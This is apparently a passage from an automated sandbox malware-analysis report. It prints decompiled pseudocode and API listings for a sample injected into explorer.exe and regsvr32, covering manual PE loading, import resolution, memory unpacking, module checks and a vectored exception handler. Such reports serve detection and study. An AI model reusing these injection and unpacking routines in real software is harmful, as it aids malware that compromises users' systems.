                  										_t282 = 0x3c;
                  										_v636 = _t220;
                  										_push(_v628 % _t282 & 0x0000ffff);
                  										E00089640(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
                  										E000885D5( &_v636);
                  										E0008A911(_t249, 0, 0xbb8, 1);
                  										E0008861A( &_v624, 0xfffffffe);
                  									}
                  									goto L41;
                  								}
                  							}
                  						} else {
                  							_t238 =  *((intOrPtr*)(_t262 + 0x214));
                  							__eflags = _t238 - _t246;
                  							if(_t238 == _t246) {
                  								goto L17;
                  							}
                  							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
                  							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
                  								L36:
                  								_t144 = E000895E1(_t262, 0x610);
                  								_push(0);
                  								_push(_t144);
                  								_v616 = _t144;
                  								_t145 =  *0x9e688; // 0xb0000
                  								_t329 = E000892E5(_t145 + 0x228);
                  								_v612 = _t329;
                  								__eflags = _t329;
                  								if(_t329 != 0) {
                  									_t160 = E0008B269(_t329);
                  									__eflags = _t160;
                  									if(_t160 != 0) {
                  										_t163 =  *0x9e684; // 0x293f8f0
                  										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
                  									}
                  									E0008861A( &_v612, 0xfffffffe);
                  								}
                  								E000885D5( &_v616);
                  								_t150 =  *0x9e688; // 0xb0000
                  								lstrcpynW(_t150 + 0x438,  *0x9e740, 0x105);
                  								_t153 =  *0x9e688; // 0xb0000
                  								_t154 = _t153 + 0x228;
                  								__eflags = _t154;
                  								lstrcpynW(_t154,  *0x9e738, 0x105);
                  								_t331 =  *0x9e688; // 0xb0000
                  								_t117 = _t331 + 0x228; // 0xb0228
                  								 *((intOrPtr*)(_t331 + 0x434)) = E00088FBE(_t117, __eflags);
                  								E0008861A(0x9e740, 0xfffffffe);
                  								E0008861A(0x9e738, 0xfffffffe);
                  								L41:
                  								_t159 = 0;
                  								__eflags = 0;
                  								L42:
                  								return _t159;
                  							}
                  							__eflags = _t238 - 2;
                  							if(_t238 != 2) {
                  								goto L36;
                  							}
                  							goto L17;
                  						}
                  					}
                  					L8:
                  					_t159 = _t122 | 0xffffffff;
                  					goto L42;
                  				}
                  				_t250 = E000895C7(0x6e2);
                  				_v616 = _t250;
                  				_t326 = E000895C7(0x9f5);
                  				_v612 = _t326;
                  				if(_t250 != 0 && _t326 != 0) {
                  					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
                  						_v620 = 1;
                  					}
                  					E000885C2( &_v616);
                  					_t122 = E000885C2( &_v612);
                  					_t351 = _v620;
                  					if(_v620 != 0) {
                  						goto L8;
                  					}
                  				}
                  			}

                  APIs
                  • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00084DC0
                  • GetModuleHandleA.KERNEL32(00000000), ref: 00084DC7
                  • lstrcpynW.KERNEL32(000AFBC8,00000105), ref: 0008526F
                  • lstrcpynW.KERNEL32(000AFDD8,00000105), ref: 00085283
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: HandleModulelstrcpyn
                  • String ID:
                  • API String ID: 3430401031-0
                  • Opcode ID: 3c327dc972dc27ac34c8bcfc415fed6bdfd7d0c2be9df9a58538f6eb7eb5bbf5
                  • Instruction ID: 161cbc9eeedcce8db67ccaa0b8f26abb365355608c06558398d668d8ddb63534
                  • Opcode Fuzzy Hash: 3c327dc972dc27ac34c8bcfc415fed6bdfd7d0c2be9df9a58538f6eb7eb5bbf5
                  • Instruction Fuzzy Hash: 64E1AE71608341AFE750FF64DC86FAA73E9BB98314F04092AF584DB2D2EB74D9448B52
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 52%
                  			E00092AEC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                  				signed int _v5;
                  				signed short _v12;
                  				intOrPtr* _v16;
                  				signed int* _v20;
                  				intOrPtr _v24;
                  				unsigned int _v28;
                  				signed short* _v32;
                  				struct HINSTANCE__* _v36;
                  				intOrPtr* _v40;
                  				signed short* _v44;
                  				intOrPtr _v48;
                  				unsigned int _v52;
                  				intOrPtr _v56;
                  				_Unknown_base(*)()* _v60;
                  				signed int _v64;
                  				intOrPtr _v68;
                  				intOrPtr _v72;
                  				unsigned int _v76;
                  				intOrPtr _v80;
                  				signed int _v84;
                  				intOrPtr _v88;
                  				signed int _t149;
                  				void* _t189;
                  				signed int _t194;
                  				signed int _t196;
                  				intOrPtr _t236;
                  
                  				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                  				_v24 = _v72;
                  				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
                  				_v56 = _t236;
                  				if(_t236 == 0) {
                  					L13:
                  					while(0 != 0) {
                  					}
                  					_push(8);
                  					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
                  						L35:
                  						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
                  						while(0 != 0) {
                  						}
                  						if(_a12 != 0) {
                  							 *_a12 = _v68;
                  						}
                  						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
                  						return _v68(_a4, 1, _a8);
                  					}
                  					_v84 = 0x80000000;
                  					_t149 = 8;
                  					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
                  					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
                  						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                  						if(_v36 == 0) {
                  							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                  						}
                  						if(_v36 != 0) {
                  							if( *_v16 == 0) {
                  								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
                  							} else {
                  								_v20 =  *_v16 + _a4;
                  							}
                  							_v64 = _v64 & 0x00000000;
                  							while( *_v20 != 0) {
                  								if(( *_v20 & _v84) == 0) {
                  									_v88 =  *_v20 + _a4;
                  									_v60 = GetProcAddress(_v36, _v88 + 2);
                  								} else {
                  									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
                  								}
                  								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
                  									 *_v20 = _v60;
                  								} else {
                  									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
                  								}
                  								_v20 =  &(_v20[1]);
                  								_v64 = _v64 + 4;
                  							}
                  							_v16 = _v16 + 0x14;
                  							continue;
                  						} else {
                  							_t189 = 0xfffffffd;
                  							return _t189;
                  						}
                  					}
                  					goto L35;
                  				}
                  				_t194 = 8;
                  				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
                  				_t196 = 8;
                  				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
                  				while(0 != 0) {
                  				}
                  				while(_v48 > 0) {
                  					_v28 = _v44[2];
                  					_v48 = _v48 - _v28;
                  					_v28 = _v28 - 8;
                  					_v28 = _v28 >> 1;
                  					_v32 =  &(_v44[4]);
                  					_v80 = _a4 +  *_v44;
                  					_v52 = _v28;
                  					while(1) {
                  						_v76 = _v52;
                  						_v52 = _v52 - 1;
                  						if(_v76 == 0) {
                  							break;
                  						}
                  						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
                  						_v12 =  *_v32 & 0xfff;
                  						_v40 = (_v12 & 0x0000ffff) + _v80;
                  						if((_v5 & 0x000000ff) != 3) {
                  							if((_v5 & 0x000000ff) == 0xa) {
                  								 *_v40 =  *_v40 + _v56;
                  							}
                  						} else {
                  							 *_v40 =  *_v40 + _v56;
                  						}
                  						_v32 =  &(_v32[1]);
                  					}
                  					_v44 = _v32;
                  				}
                  				goto L13;
                  			}

                  APIs
                  • GetModuleHandleA.KERNEL32(?), ref: 00092C4C
                  • LoadLibraryA.KERNEL32(?), ref: 00092C65
                  • GetProcAddress.KERNEL32(00000000,890CC483), ref: 00092CC1
                  • GetProcAddress.KERNEL32(00000000,?), ref: 00092CE0
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AddressProc$HandleLibraryLoadModule
                  • String ID:
                  • API String ID: 384173800-0
                  • Opcode ID: 8b0f860062b7566b354e1c94a9238a23d10e63c9254979b45f4c1e3852145292
                  • Instruction ID: f71a99207cef5de23c8ddc2f8d773f6edabddc3cd5bada4ad458651b88394428
                  • Opcode Fuzzy Hash: 8b0f860062b7566b354e1c94a9238a23d10e63c9254979b45f4c1e3852145292
                  • Instruction Fuzzy Hash: E4A17AB5A01209EFCF54CFA8C885AADBBF1FF08314F148459E815AB351D734AA81DF64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 75%
                  			E00081C68(signed int __ecx, void* __eflags, void* __fp0) {
                  				char _v16;
                  				intOrPtr _v20;
                  				char _v24;
                  				char _v28;
                  				void* _t13;
                  				intOrPtr _t15;
                  				signed int _t16;
                  				intOrPtr _t17;
                  				signed int _t18;
                  				char _t20;
                  				intOrPtr _t22;
                  				void* _t23;
                  				void* _t24;
                  				intOrPtr _t29;
                  				intOrPtr _t35;
                  				intOrPtr _t41;
                  				intOrPtr _t43;
                  				intOrPtr _t48;
                  				void* _t51;
                  				signed int _t61;
                  				signed int _t64;
                  				void* _t71;
                  
                  				_t71 = __fp0;
                  				_t61 = __ecx;
                  				_t41 =  *0x9e6dc; // 0x0
                  				_t13 = E0008A4BF(_t41, 0);
                  				while(_t13 < 0) {
                  					E0008980C( &_v28);
                  					_t43 =  *0x9e6e0; // 0x0
                  					_t15 =  *0x9e6e4; // 0x0
                  					_t41 = _t43 + 0xe10;
                  					asm("adc eax, ebx");
                  					__eflags = _t15 - _v24;
                  					if(__eflags > 0) {
                  						L9:
                  						_t16 = 0xfffffffe;
                  						L13:
                  						return _t16;
                  					}
                  					if(__eflags < 0) {
                  						L4:
                  						_t17 =  *0x9e684; // 0x293f8f0
                  						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x9e6d0, 0);
                  						__eflags = _t18;
                  						if(_t18 == 0) {
                  							break;
                  						}
                  						_t35 =  *0x9e684; // 0x293f8f0
                  						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
                  						_t41 =  *0x9e6dc; // 0x0
                  						__eflags = 0;
                  						_t13 = E0008A4BF(_t41, 0);
                  						continue;
                  					}
                  					__eflags = _t41 - _v28;
                  					if(_t41 >= _v28) {
                  						goto L9;
                  					}
                  					goto L4;
                  				}
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				_t20 =  *0x9e6e8; // 0x0
                  				_v28 = _t20;
                  				_t22 = E0008A6A9(_t41, _t61,  &_v16);
                  				_v20 = _t22;
                  				if(_t22 != 0) {
                  					_t23 = GetCurrentProcess();
                  					_t24 = GetCurrentThread();
                  					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x9e6d0, 0, 0, 2);
                  					E0008980C(0x9e6e0);
                  					_t64 = E00081A1B( &_v28, E00081226, _t71);
                  					__eflags = _t64;
                  					if(_t64 >= 0) {
                  						_push(0);
                  						_push( *0x9e760);
                  						_t51 = 0x27;
                  						E00089F06(_t51);
                  					}
                  				} else {
                  					_t64 = _t61 | 0xffffffff;
                  				}
                  				_t29 =  *0x9e684; // 0x293f8f0
                  				 *((intOrPtr*)(_t29 + 0x30))( *0x9e6d0);
                  				_t48 =  *0x9e6dc; // 0x0
                  				 *0x9e6d0 = 0;
                  				E0008A4DB(_t48);
                  				E0008861A( &_v24, 0);
                  				_t16 = _t64;
                  				goto L13;
                  			}

                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cef3a4d28e3be0b82092db3b14ebb9ad06c50a558e835dc08a0c3f29a3390bca
                  • Instruction ID: b7eecfca9752b51bd3878614f3e3ca223f58aa9d07610ca166e7e1ee13e62024
                  • Opcode Fuzzy Hash: cef3a4d28e3be0b82092db3b14ebb9ad06c50a558e835dc08a0c3f29a3390bca
                  • Instruction Fuzzy Hash: A431C232604340AFE754FFA4EC859AA77ADFB943A0F54092BF581C32E2DE389C058756
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 73%
                  			E00081B2D(void* __eflags, void* __fp0) {
                  				char _v24;
                  				char _v28;
                  				void* _t12;
                  				intOrPtr _t14;
                  				void* _t15;
                  				intOrPtr _t16;
                  				void* _t17;
                  				void* _t19;
                  				void* _t20;
                  				char _t24;
                  				intOrPtr _t26;
                  				intOrPtr _t28;
                  				intOrPtr _t33;
                  				intOrPtr _t38;
                  				intOrPtr _t40;
                  				void* _t41;
                  				intOrPtr _t46;
                  				void* _t48;
                  				intOrPtr _t51;
                  				void* _t61;
                  				void* _t71;
                  
                  				_t71 = __fp0;
                  				_t38 =  *0x9e6f4; // 0x0
                  				_t12 = E0008A4BF(_t38, 0);
                  				while(_t12 < 0) {
                  					E0008980C( &_v28);
                  					_t40 =  *0x9e700; // 0x0
                  					_t14 =  *0x9e704; // 0x0
                  					_t41 = _t40 + 0x3840;
                  					asm("adc eax, ebx");
                  					__eflags = _t14 - _v24;
                  					if(__eflags > 0) {
                  						L13:
                  						_t15 = 0;
                  					} else {
                  						if(__eflags < 0) {
                  							L4:
                  							_t16 =  *0x9e684; // 0x293f8f0
                  							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x9e6ec, 0);
                  							__eflags = _t17;
                  							if(_t17 == 0) {
                  								break;
                  							} else {
                  								_t33 =  *0x9e684; // 0x293f8f0
                  								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
                  								_t51 =  *0x9e6f4; // 0x0
                  								__eflags = 0;
                  								_t12 = E0008A4BF(_t51, 0);
                  								continue;
                  							}
                  						} else {
                  							__eflags = _t41 - _v28;
                  							if(_t41 >= _v28) {
                  								goto L13;
                  							} else {
                  								goto L4;
                  							}
                  						}
                  					}
                  					L12:
                  					return _t15;
                  				}
                  				E0008980C(0x9e700);
                  				_t19 = GetCurrentProcess();
                  				_t20 = GetCurrentThread();
                  				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x9e6ec, 0, 0, 2);
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				_t24 =  *0x9e6e8; // 0x0
                  				_v28 = _t24;
                  				_t61 = E00081A1B( &_v28, E0008131E, _t71);
                  				if(_t61 >= 0) {
                  					_push(0);
                  					_push( *0x9e760);
                  					_t48 = 0x27;
                  					E00089F06(_t48);
                  				}
                  				if(_v24 != 0) {
                  					E00086890( &_v24);
                  				}
                  				_t26 =  *0x9e684; // 0x293f8f0
                  				 *((intOrPtr*)(_t26 + 0x30))( *0x9e6ec);
                  				_t28 =  *0x9e758; // 0x0
                  				 *0x9e6ec = 0;
                  				_t29 =  !=  ? 1 : _t28;
                  				_t46 =  *0x9e6f4; // 0x0
                  				 *0x9e758 =  !=  ? 1 : _t28;
                  				E0008A4DB(_t46);
                  				_t15 = _t61;
                  				goto L12;
                  			}

                  APIs
                  • GetCurrentProcess.KERNEL32(0009E6EC,00000000,00000000,00000002), ref: 00081BCC
                  • GetCurrentThread.KERNEL32(00000000), ref: 00081BCF
                  • GetCurrentProcess.KERNEL32(00000000), ref: 00081BD6
                  • DuplicateHandle.KERNEL32 ref: 00081BD9
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: Current$Process$DuplicateHandleThread
                  • String ID:
                  • API String ID: 3566409357-0
                  • Opcode ID: 2b104535f768232c2eb60f4591d1ea5aaf0333a9885dded86699bdb0ae67a6b5
                  • Instruction ID: c21506e0fc88ba440ea6bcc6b6f55abd04b465cff164c1f0cab10b664a380183
                  • Opcode Fuzzy Hash: 2b104535f768232c2eb60f4591d1ea5aaf0333a9885dded86699bdb0ae67a6b5
                  • Instruction Fuzzy Hash: F13184716043519FF704FFA4EC899AA77A9FF94390B04496EF681C72A2DB389C05CB52
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 94%
                  			E0008B7A8(WCHAR* __ecx, void* __edx) {
                  				signed int _v8;
                  				long _v12;
                  				char _v16;
                  				short _v528;
                  				char _v1040;
                  				char _v1552;
                  				intOrPtr _t23;
                  				char _t27;
                  				intOrPtr _t28;
                  				signed int _t29;
                  				void* _t33;
                  				long _t38;
                  				WCHAR* _t43;
                  				WCHAR* _t56;
                  
                  				_t44 = __ecx;
                  				_v8 = _v8 & 0x00000000;
                  				_t43 = __edx;
                  				_t56 = __ecx;
                  				memset(__edx, 0, 0x100);
                  				_v12 = 0x100;
                  				_t23 =  *0x9e684; // 0x293f8f0
                  				 *((intOrPtr*)(_t23 + 0xb0))( &_v528,  &_v12);
                  				lstrcpynW(_t43,  &_v528, 0x100);
                  				_t27 = E000895E1(_t44, 0xa88);
                  				_v16 = _t27;
                  				_t28 =  *0x9e684; // 0x293f8f0
                  				_t29 =  *((intOrPtr*)(_t28 + 0x68))(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
                  				asm("sbb eax, eax");
                  				_v8 = _v8 &  ~_t29;
                  				E000885D5( &_v16);
                  				_t33 = E0008C392(_t43);
                  				E00089640( &(_t43[E0008C392(_t43)]), 0x100 - _t33, L"%u", _v8);
                  				lstrcatW(_t43, _t56);
                  				_t38 = E0008C392(_t43);
                  				_v12 = _t38;
                  				CharUpperBuffW(_t43, _t38);
                  				return E0008D400(_t43, E0008C392(_t43) + _t40, 0);
                  			}

                  APIs
                  • memset.MSVCRT ref: 0008B7C5
                  • lstrcpynW.KERNEL32(?,?,00000100), ref: 0008B7EF
                    • Part of subcall function 00089640: _vsnwprintf.MSVCRT ref: 0008965D
                  • lstrcatW.KERNEL32 ref: 0008B85A
                  • CharUpperBuffW.USER32(?,00000000), ref: 0008B86C
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: BuffCharUpper_vsnwprintflstrcatlstrcpynmemset
                  • String ID:
                  • API String ID: 1024327890-0
                  • Opcode ID: bc563f98a76ff39ef6b2d004b5433a24202d3bbaf09a1f5485630d8fc5a90238
                  • Instruction ID: 8115248732dee6e15747b0cfab76d271734f3ac179cb7c14a2a6e9e989f043a1
                  • Opcode Fuzzy Hash: bc563f98a76ff39ef6b2d004b5433a24202d3bbaf09a1f5485630d8fc5a90238
                  • Instruction Fuzzy Hash: F82156B2A00214BFE714BBA4DC4AFEE77BCFB85310F108566B505E6182EE755F088B60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Executed Functions

                  Control-flow Graph

                  APIs
                  • VirtualAlloc.KERNEL32(00000000,00000814,00003000,00000040,00000814,10077380), ref: 100779EB
                  • VirtualAlloc.KERNEL32(00000000,000004CA,00003000,00000040,100773E0), ref: 10077A22
                  • VirtualAlloc.KERNEL32(00000000,00028122,00003000,00000040), ref: 10077A82
                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 10077AB8
                  • VirtualProtect.KERNEL32(10000000,00000000,00000004,1007790D), ref: 10077BBD
                  • VirtualProtect.KERNEL32(10000000,00001000,00000004,1007790D), ref: 10077BE4
                  • VirtualProtect.KERNEL32(00000000,?,00000002,1007790D), ref: 10077CB1
                  • VirtualProtect.KERNEL32(00000000,?,00000002,1007790D,?), ref: 10077D07
                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 10077D23
                  Memory Dump Source
                  • Source File: 00000010.00000002.606433354.0000000010077000.00000040.00020000.sdmp, Offset: 10077000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_10077000_regsvr32.jbxd
                  Similarity
                  • API ID: Virtual$Protect$Alloc$Free
                  • String ID:
                  • API String ID: 2574235972-0
                  • Opcode ID: 70a75cfa5ba03345d47f256e82c004e9dc0d4809c604307a2666930abcd254c7
                  • Instruction ID: e61e719fcc5ffd65f3e7435c319bc58e36d786470a44bd70215d6a9d31556276
                  • Opcode Fuzzy Hash: 70a75cfa5ba03345d47f256e82c004e9dc0d4809c604307a2666930abcd254c7
                  • Instruction Fuzzy Hash: F8D18D767086009FDB11CF14C8C0B927BA6FF8C750B194599ED6D9F25AD7B4B810CBA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                  • GetSystemDirectoryW.KERNEL32(10076908,00000744), ref: 10028DE1
                  • VirtualProtectEx.KERNEL32(000000FF,101159C8,000051F0,00000040,10114064), ref: 10028E25
                  Memory Dump Source
                  • Source File: 00000010.00000002.606383541.0000000010021000.00000020.00020000.sdmp, Offset: 10021000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_10021000_regsvr32.jbxd
                  Similarity
                  • API ID: DirectoryProtectSystemVirtual
                  • String ID:
                  • API String ID: 648172718-0
                  • Opcode ID: 4e67b1718750c374d10788d2f48c160aff6023570f1aafa6d89d8890ad6d1c89
                  • Instruction ID: 8567422235b8483302f276b06f5c76c9c9f5ec01d0adbca6e2a98c3bb5a49452
                  • Opcode Fuzzy Hash: 4e67b1718750c374d10788d2f48c160aff6023570f1aafa6d89d8890ad6d1c89
                  • Instruction Fuzzy Hash: 6AA1D435A046F14FE7349B388DD81E83FB2EB99312B59476AD4C4A72A5D2BE4CC4CB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  Control-flow Graph

                  APIs
                  • GetWindowsDirectoryW.KERNEL32 ref: 10029B87
                  • FindFirstChangeNotificationW.KERNEL32(10114AA8,00000000,00000020), ref: 10029BD2
                  Strings
                  Memory Dump Source
                  • Source File: 00000010.00000002.606383541.0000000010021000.00000020.00020000.sdmp, Offset: 10021000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_10021000_regsvr32.jbxd
                  Similarity
                  • API ID: ChangeDirectoryFindFirstNotificationWindows
                  • String ID: 1
                  • API String ID: 3662519435-2212294583
                  • Opcode ID: 0b9660a65e4cab3b7e7ad5c03af4bb0263a6bc0f85f4f16362e04827d69aa07f
                  • Instruction ID: a17468885719ca7b42c6c3de4681764e2a8d7b2457ed512f777c56a051c8a142
                  • Opcode Fuzzy Hash: 0b9660a65e4cab3b7e7ad5c03af4bb0263a6bc0f85f4f16362e04827d69aa07f
                  • Instruction Fuzzy Hash: 3851CF72A043A08FE335CF28CCC85D677E1EB88302F21472ED58597295D6BAAC85CB81
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Executed Functions

                  C-Code - Quality: 100%
                  			E00085A61(void* __eflags) {
                  				intOrPtr _t2;
                  				void* _t6;
                  				void* _t7;
                  
                  				_t2 =  *0x9e684; // 0x40f8f0
                  				 *((intOrPtr*)(_t2 + 0x108))(1, E00085A06);
                  				E00085631(_t6, _t7); // executed
                  				return 0;
                  			}

                  APIs
                  • RtlAddVectoredExceptionHandler.NTDLL(00000001,00085A06,00085CE8), ref: 00085A6D
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: ExceptionHandlerVectored
                  • String ID:
                  • API String ID: 3310709589-0
                  • Opcode ID: bf483f35d551d8ef1a3c1b7981991285dfd450bd0acbef69aa8c4020bc965baf
                  • Instruction ID: 435aaf7462d5f916828f25a0b113b0bfc22426b62e8c3a1df64e723560edf676
                  • Opcode Fuzzy Hash: bf483f35d551d8ef1a3c1b7981991285dfd450bd0acbef69aa8c4020bc965baf
                  • Instruction Fuzzy Hash: 2FB092312509409BD640FB60CC8AEC83290BB20782F4100A072858A0A3DAE048906702
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 80%
                  			E00084A0B(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
                  				char _v516;
                  				void _v1044;
                  				char _v1076;
                  				signed int _v1080;
                  				signed int _v1096;
                  				WCHAR* _v1100;
                  				intOrPtr _v1104;
                  				signed int _v1108;
                  				CHAR* _v1112;
                  				char _v1116;
                  				void* __esi;
                  				intOrPtr _t66;
                  				CHAR* _t73;
                  				signed int _t75;
                  				intOrPtr _t76;
                  				signed int _t80;
                  				signed int _t81;
                  				WCHAR* _t87;
                  				void* _t89;
                  				signed int _t90;
                  				signed int _t91;
                  				signed int _t93;
                  				signed int _t94;
                  				WCHAR* _t96;
                  				CHAR* _t106;
                  				void* _t108;
                  				intOrPtr _t109;
                  				signed char _t116;
                  				WCHAR* _t118;
                  				void* _t122;
                  				signed int _t123;
                  				intOrPtr _t125;
                  				void* _t128;
                  				void* _t129;
                  				WCHAR* _t130;
                  				void* _t134;
                  				void* _t141;
                  				void* _t143;
                  				WCHAR* _t145;
                  				signed int _t153;
                  				void* _t154;
                  				void* _t178;
                  				signed int _t180;
                  				void* _t181;
                  				void* _t183;
                  				void* _t187;
                  				signed int _t188;
                  				WCHAR* _t190;
                  				signed int _t191;
                  				signed int _t192;
                  				intOrPtr* _t194;
                  				signed int _t196;
                  				void* _t199;
                  				void* _t200;
                  				void* _t201;
                  				void* _t202;
                  				intOrPtr* _t203;
                  				void* _t208;
                  
                  				_t208 = __fp0;
                  				_push(_t191);
                  				_t128 = __edx;
                  				_t187 = __ecx;
                  				_t192 = _t191 | 0xffffffff;
                  				memset( &_v1044, 0, 0x20c);
                  				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
                  				_v1108 = 1;
                  				if(_t187 != 0) {
                  					_t123 =  *0x9e688; // 0xb0000
                  					_t125 =  *0x9e68c; // 0x40fab8
                  					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
                  				}
                  				if(E0008BB8D(_t187) != 0) {
                  					L4:
                  					_t134 = _t128; // executed
                  					_t66 = E0008B7A8(_t134,  &_v516); // executed
                  					_push(_t134);
                  					_v1104 = _t66;
                  					E0008B67D(_t66,  &_v1076, _t206, _t208);
                  					_t129 = E000849C7( &_v1076,  &_v1076, _t206);
                  					_t141 = E0008D400( &_v1076, E0008C379( &_v1076), 0);
                  					E0008B88A(_t141,  &_v1100, _t208);
                  					_t175 =  &_v1076;
                  					_t73 = E00082C8F(_t187,  &_v1076, _t206, _t208); // executed
                  					_v1112 = _t73;
                  					_t143 = _t141;
                  					if(_t73 != 0) {
                  						_push(0);
                  						_push(_t129);
                  						_push("\\");
                  						_t130 = E000892E5(_t73);
                  						_t200 = _t199 + 0x10;
                  						_t75 =  *0x9e688; // 0xb0000
                  						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
                  						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
                  							L12:
                  							__eflags = _v1108;
                  							if(__eflags != 0) {
                  								_t76 = E000891E3(_v1112);
                  								_t145 = _t130;
                  								 *0x9e740 = _t76;
                  								 *0x9e738 = E000891E3(_t145);
                  								L17:
                  								_push(_t145);
                  								_t80 = E00089B43( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100); // executed
                  								_t188 = _t80;
                  								_t201 = _t200 + 0x10;
                  								__eflags = _t188;
                  								if(_t188 == 0) {
                  									goto L41;
                  								}
                  								_push(0x9b9ca);
                  								E00089F48(0xe); // executed
                  								E00089F6C(_t188, _t208, _t130); // executed
                  								_t194 = _a4;
                  								_v1096 = _v1096 & 0x00000000;
                  								_push(2);
                  								_v1100 =  *_t194;
                  								_push(8);
                  								_push( &_v1100);
                  								_t178 = 0xb; // executed
                  								E0008A0AB(_t188, _t178, _t208); // executed
                  								_t179 =  *(_t194 + 0x10);
                  								_t202 = _t201 + 0xc;
                  								__eflags =  *(_t194 + 0x10);
                  								if( *(_t194 + 0x10) != 0) {
                  									E0008A3ED(_t188, _t179, _t208);
                  								}
                  								_t180 =  *(_t194 + 0xc);
                  								__eflags = _t180;
                  								if(_t180 != 0) {
                  									E0008A3ED(_t188, _t180, _t208); // executed
                  								}
                  								_t87 = E0008980C(0);
                  								_push(2);
                  								_v1100 = _t87;
                  								_t153 = _t188;
                  								_push(8);
                  								_v1096 = _t180;
                  								_push( &_v1100);
                  								_t181 = 2; // executed
                  								_t89 = E0008A0AB(_t153, _t181, _t208); // executed
                  								_t203 = _t202 + 0xc;
                  								__eflags = _v1108;
                  								if(_v1108 == 0) {
                  									_t153 =  *0x9e688; // 0xb0000
                  									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
                  									if(__eflags != 0) {
                  										_t90 = E0008FC1F(_t89, _t181, _t208, 0, _t130, 0);
                  										_t203 = _t203 + 0xc;
                  										goto L26;
                  									}
                  									_t153 = _t153 + 0x228;
                  									goto L25;
                  								} else {
                  									_t91 =  *0x9e688; // 0xb0000
                  									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
                  									if(__eflags != 0) {
                  										L32:
